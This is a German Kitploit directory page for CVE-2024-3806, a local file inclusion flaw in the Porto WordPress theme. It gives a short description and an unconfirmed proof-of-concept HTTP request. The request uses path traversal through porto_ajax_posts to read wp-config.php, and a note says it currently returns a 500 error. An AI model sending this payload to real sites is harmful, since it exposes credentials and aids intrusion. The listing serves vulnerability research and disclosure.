Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-3806 — Porto <= 7.1.0 - Nicht authentifizierte lokale Dateieinbindung über porto_ajax_posts | Kitploit
Tools/GitHubGitHub/randomrobbiebf/cve-2024-3806
SchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstests
GitHubrandomrobbiebf/cve-2024-3806

CVE-2024-3806

Porto <= 7.1.0 - Nicht authentifizierte lokale Dateieinbindung über porto_ajax_posts

Repository anzeigen
vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-3806

Porto <= 7.1.0 - Nicht authentifizierte lokale Dateieinbindung via porto_ajax_posts

Beschreibung

Das Porto-Theme für WordPress ist in allen Versionen bis einschließlich 7.1.0 anfällig für Local File Inclusion über die Funktion 'porto_ajax_posts'. Dies ermöglicht es nicht authentifizierten Angreifern, beliebige Dateien auf dem Server einzubinden und auszuführen, wodurch die Ausführung von beliebigem PHP-Code in diesen Dateien möglich ist. Dies kann verwendet werden, um Zugriffskontrollen zu umgehen, sensible Daten zu erlangen oder Codeausführung zu erreichen, falls PHP-Dateien hochgeladen und eingebunden werden können.

Unbestätigter PoC

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: kubernetes.docker.internal
Content-Type: application/x-www-form-urlencoded
Content-Length: 116

action=porto_ajax_posts&post_type=post&extra={"shortcode":"porto_posts_grid","template":"../../../../wp-config.php"}

Anmerkungen

Erhalte derzeit einen 500-Fehler.

Tool herunterladen